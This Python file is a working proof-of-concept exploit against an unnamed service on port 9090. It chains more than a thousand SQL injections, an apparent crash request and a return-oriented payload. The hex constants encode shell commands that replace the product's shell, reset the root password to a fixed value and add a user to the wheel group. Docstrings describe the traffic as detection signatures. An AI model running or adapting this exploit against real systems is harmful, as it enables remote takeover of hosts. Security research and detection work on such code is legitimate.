from pwn import *
import requests
import argparse
from requests.packages import urllib3
# Silences the InsecureRequestWarning that verify=False would otherwise emit.
# Every URL in this file is plain http://, so verify=False has no effect
# here anyway. NOTE(review): requests.packages is a compatibility alias for
# the top-level urllib3 package; presumably `import urllib3` is the intended
# form — confirm against the installed requests version.
urllib3.disable_warnings()
parser = argparse.ArgumentParser()
# The only CLI option: the target host. It is interpolated into URLs and
# passed to a raw socket connect with no validation beyond presence.
parser.add_argument('-ip', help='target url')
args = parser.parse_args()
class POC:
    """Proof-of-concept client that drives a fixed sequence of requests at
    port 9090 of one host.

    The target product is not named on the page; what can be documented is
    the traffic the class generates, which is what a detection engineer
    needs. Observable request shapes, in the order they are sent:

    * many GETs to ``/query/clientverification2`` whose ``_uname`` value
      starts with ``array'));`` and carries SQL against a ``localgroups``
      table, with ``/**/`` used in place of every space (``_add_sql``);
    * one POST of a small ``<GroupNotification>`` XML document to
      ``/query/hosts`` (``_crash_server``);
    * one raw-socket GET to ``/query/hosts?_uname=array&_pid=admin&_role=``
      carrying a very long colon-separated list, sent with a hard-coded
      ``Host: 127.0.0.1`` header (``_rock``).

    All three are unusual enough to be signatures on their own.
    """

    def __init__(self, ip):
        # Target host or IP as given on the command line.
        self.ip = ip

    def generate_groupnames(self):
        """Return the first 1034 two-character strings over ``[a-z0-9]`` in
        lexicographic order ("aa", "ab", ...).

        36 * 36 = 1296 candidates exist, so the cap of 1034 is always reached
        and the list is returned from inside the loop; the function never
        falls off the end (which would yield ``None``).
        """
        _groupnames = []
        basic_chs = "abcdefghijklmnopqrstuvwxyz0123456789"
        _tmp = 0
        for x in basic_chs:
            for y in basic_chs:
                if _tmp >= 1034:
                    return _groupnames
                _tmp_str = x + y
                _groupnames.append(_tmp_str)
                _tmp += 1

    def _add_sql(self, payload):
        """Send one SQL statement through the ``_uname`` query parameter and
        stop the whole process if the response no longer contains ``<Rules>``.

        ``array'));`` closes the server-side expression and ``;/**/--``
        terminates it; ``/**/`` stands in for spaces. A response without
        ``<Rules>`` is treated as a failed injection: the payload is printed
        and the script exits with status 0 (not a failure status), so a
        caller cannot distinguish success from abort via the exit code.
        """
        URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + payload + ";/**/--"
        HEADERS = {"Connection": "close"}
        res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
        if "<Rules>" not in res.text:
            print(payload)
            exit(0)

    def _crash_server(self):
        """POST a minimal ``<GroupNotification>`` XML document to
        ``/query/hosts``.

        Every exception, including the 5 s timeout, is swallowed by the bare
        ``except``. The method name suggests the request is expected not to
        return normally, but the page does not show what the server does
        with it — TODO confirm.
        """
        try:
            URL = "http://" + self.ip + ":9090/query/hosts"
            HEADERS = {"Content-Type": "application/xml"}
            DATA = "<xml>\r\n <GroupNotification Op=\"0\" MasterID=\"1\" PeerID=\"2\" GID=\"3\">\r\n </GroupNotification>\r\n</xml>"
            requests.post(URL, headers=HEADERS, data=DATA, verify=False, timeout=5)
        except:
            pass

    def _rock(self):
        """Run the full sequence: clear ``localgroups``, insert 1034 generated
        rows plus a set of rows with hand-picked ``group_id`` values, trigger
        ``_crash_server``, wait 5 s, then send the raw ``_role`` request.

        ``sleep`` and ``remote`` are not imported explicitly; both rely on
        the ``from pwn import *`` at the top of the file.
        """
        group_names = self.generate_groupnames()
        sql_payloads = []
        _id = 1
        # Row ids run 1..1034. Five of them are swapped for other values:
        # 0x403 (1027), 0x404 (1028), 0x408 (1032), 0x407 (1031) and 8.
        # Note 1032 is remapped onto 1031 after the original 1031 has been
        # moved to 123457, and 1028 onto 8 after 8 moved to 123456. The
        # page does not say why these particular ids are avoided.
        for gpname in group_names:
            _tmp_id = _id
            if _tmp_id == 0x403:
                _tmp_id = 24095752
            elif _tmp_id == 0x404:
                _tmp_id = 8
            elif _tmp_id == 0x408:
                _tmp_id = 1031
            elif _tmp_id == 0x407:
                _tmp_id = 123457
            elif _tmp_id == 8:
                _tmp_id = 123456
            _payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (str(_tmp_id), gpname)
            sql_payloads.append(_payload)
            _id += 1
        # Empty the table first. Unlike _add_sql this path exits silently
        # (no print) when "<Rules>" is missing from the response.
        delete_payload = "delete/**/from/**/localgroups"
        URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + delete_payload + ";/**/--"
        HEADERS = {"Connection": "close"}
        res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
        if "<Rules>" not in res.text:
            exit(0)
        # One request per row: 1034 GETs to the same endpoint in a burst.
        for p in sql_payloads:
            self._add_sql(p)
        # Numeric values whose names suggest a gadget address, a function
        # address, two halves of a second address, and 32-bit words of a
        # command string (command_p*, command_part2_*, command_part3_*).
        # They are not decoded here. Each is stored as a group_id under a
        # short marker name ("gad", "sys", "ca1", "cm1", ...) that the
        # _role string below references by name.
        # command_p14..p17 and command_part2_2..4 are assigned but never
        # inserted; their values equal command_p6..p9 and command_p2..p4
        # respectively, and _role reuses the labels cm6..cm9 / cm2..cm4
        # in their place.
        pop_rdi_ret = 0x0044f6ce
        system_address = 0x0044D21C
        command_address1 = 0xffffe6e0
        command_address2 = 0x00007fff
        command_p27 = 0x3b3020
        command_p26 = 0x682d2074
        command_p25 = 0x6f6f7220
        command_p24 = 0x646f6d72
        command_p23 = 0x65737520
        command_p22 = 0x7770207c
        command_p21 = 0x20333231
        command_p20 = 0x656d6b63
        command_p19 = 0x3066206f
        command_p18 = 0x6863653b
        command_p17 = 0x6c6c6568
        command_p16 = 0x735f6163
        command_p15 = 0x2f6e6962
        command_p14 = 0x2f61632f
        command_p13 = 0x2068732f
        command_p12 = 0x6e69622f
        command_p11 = 0x2070633b
        command_p10 = 0x6b61622e
        command_p9 = 0x6c6c6568
        command_p8 = 0x735f6163
        command_p7 = 0x2f6e6962
        command_p6 = 0x2f61632f
        command_p5 = 0x206c6c65
        command_p4 = 0x68735f61
        command_p3 = 0x632f6e69
        command_p2 = 0x622f6163
        command_p1 = 0x2f207063
        command_part2_5 = 0x3b6c6c65
        command_part2_4 = 0x68735f61
        command_part2_3 = 0x632f6e69
        command_part2_2 = 0x622f6163
        command_part2_1 = 0x2f206d72
        command_part3_8 = 0x3b6c2d20
        command_part3_7 = 0x736c3b6c
        command_part3_6 = 0x65656877
        command_part3_5 = 0x20472d20
        command_part3_4 = 0x79617272
        command_part3_3 = 0x6120646f
        command_part3_2 = 0x6d726573
        command_part3_1 = 0x75207770
        # Same insert template as the loop above; "%s" on an int renders it
        # in decimal, so the hex constants appear as decimal group_id values
        # on the wire.
        gadget_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (pop_rdi_ret, "gad")
        system_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (system_address, "sys")
        command_addr_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address1, "ca1")
        command_addr_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address2, "ca2")
        zero_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % ("0", "zer")
        command_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p1, "cm1")
        command_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p2, "cm2")
        command_sql_payload3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p3, "cm3")
        command_sql_payload4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p4, "cm4")
        command_sql_payload5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p5, "cm5")
        command_sql_payload6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p6, "cm6")
        command_sql_payload7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p7, "cm7")
        command_sql_payload8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p8, "cm8")
        command_sql_payload9 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p9, "cm9")
        command_sql_payload10 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p10, "cm10")
        command_sql_payload11 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p11, "cm11")
        command_sql_payload12 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p12, "cm12")
        command_sql_payload13 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p13, "cm13")
        command_sql_payload18 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p18, "cm18")
        command_sql_payload19 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p19, "cm19")
        command_sql_payload20 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p20, "cm20")
        command_sql_payload21 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p21, "cm21")
        command_sql_payload22 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p22, "cm22")
        command_sql_payload23 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p23, "cm23")
        command_sql_payload24 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p24, "cm24")
        command_sql_payload25 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p25, "cm25")
        command_sql_payload26 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p26, "cm26")
        command_sql_payload27 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p27, "cm27")
        command_sql_payload_part2_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_1, "cmp21")
        command_sql_payload_part2_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_5, "cmp25")
        command_sql_payload_part3_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_1, "cmp31")
        command_sql_payload_part3_2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_2, "cmp32")
        command_sql_payload_part3_3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_3, "cmp33")
        command_sql_payload_part3_4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_4, "cmp34")
        command_sql_payload_part3_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_5, "cmp35")
        command_sql_payload_part3_6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_6, "cmp36")
        command_sql_payload_part3_7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_7, "cmp37")
        command_sql_payload_part3_8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_8, "cmp38")
        # Each insert goes through _add_sql, so any one of them failing the
        # "<Rules>" check ends the process here.
        self._add_sql(gadget_sql_payload)
        self._add_sql(system_sql_payload2)
        self._add_sql(command_addr_sql_payload1)
        self._add_sql(command_addr_sql_payload2)
        self._add_sql(zero_sql_payload)
        self._add_sql(command_sql_payload1)
        self._add_sql(command_sql_payload2)
        self._add_sql(command_sql_payload3)
        self._add_sql(command_sql_payload4)
        self._add_sql(command_sql_payload5)
        self._add_sql(command_sql_payload6)
        self._add_sql(command_sql_payload7)
        self._add_sql(command_sql_payload8)
        self._add_sql(command_sql_payload9)
        self._add_sql(command_sql_payload10)
        self._add_sql(command_sql_payload11)
        self._add_sql(command_sql_payload12)
        self._add_sql(command_sql_payload13)
        self._add_sql(command_sql_payload18)
        self._add_sql(command_sql_payload19)
        self._add_sql(command_sql_payload20)
        self._add_sql(command_sql_payload21)
        self._add_sql(command_sql_payload22)
        self._add_sql(command_sql_payload23)
        self._add_sql(command_sql_payload24)
        self._add_sql(command_sql_payload25)
        self._add_sql(command_sql_payload26)
        self._add_sql(command_sql_payload27)
        self._add_sql(command_sql_payload_part2_1)
        self._add_sql(command_sql_payload_part2_5)
        self._add_sql(command_sql_payload_part3_1)
        self._add_sql(command_sql_payload_part3_2)
        self._add_sql(command_sql_payload_part3_3)
        self._add_sql(command_sql_payload_part3_4)
        self._add_sql(command_sql_payload_part3_5)
        self._add_sql(command_sql_payload_part3_6)
        self._add_sql(command_sql_payload_part3_7)
        self._add_sql(command_sql_payload_part3_8)
        # The XML POST, then a fixed 5 s pause before the final request;
        # presumably the service needs that long to come back — TODO confirm.
        self._crash_server()
        sleep(5)
        # Whole final step is best-effort: the bare except hides connection
        # refusals, resets and any parsing problem.
        try:
            # _role = the 1034 generated names, each followed by ":", then a
            # fixed sequence of the marker names inserted above. How the
            # server consumes _role is not shown on this page.
            _role = ""
            for _gp in group_names:
                _role += _gp
                _role += ":"
            _role += "gad:zer:ca1:ca2:sys:zer:cmp31:cmp32:cmp33:cmp34:cmp35:cmp36:cmp37:cmp38:cmp21:cm2:cm3:cm4:cmp25:cm1:cm2:cm3:cm4:cm5:cm6:cm7:cm8:cm9:cm10:cm11:cm12:cm13:cm6:cm7:cm8:cm9:cm18:cm19:cm20:cm21:cm22:cm23:cm24:cm25:cm26:cm27"
            # Hand-built HTTP/1.1 request over a raw pwntools socket rather
            # than requests. The Host header is hard-coded to 127.0.0.1
            # regardless of the target; the reason is not stated. A
            # forwarded-Host mismatch like this is itself a usable log signal.
            t_payload = "GET /query/hosts?_uname=array&_pid=admin&_role=" + _role + " HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
            p = remote(self.ip, 9090)
            p.send(t_payload)
            # Single recv(): only the first chunk of the reply is printed.
            print(p.recv())
            p.close()
        except:
            pass

    def start(self):
        """Public entry point; runs the whole sequence once."""
        self._rock()
if __name__ == "__main__":
    # argparse leaves args.ip as None when -ip is absent, in which case
    # nothing is run (the original spelled this out with an empty else).
    if args.ip:
        try:
            POC(args.ip).start()
        except Exception as e:
            # exit(0) inside the class raises SystemExit, which is not an
            # Exception subclass and so passes straight through this handler.
            print(e)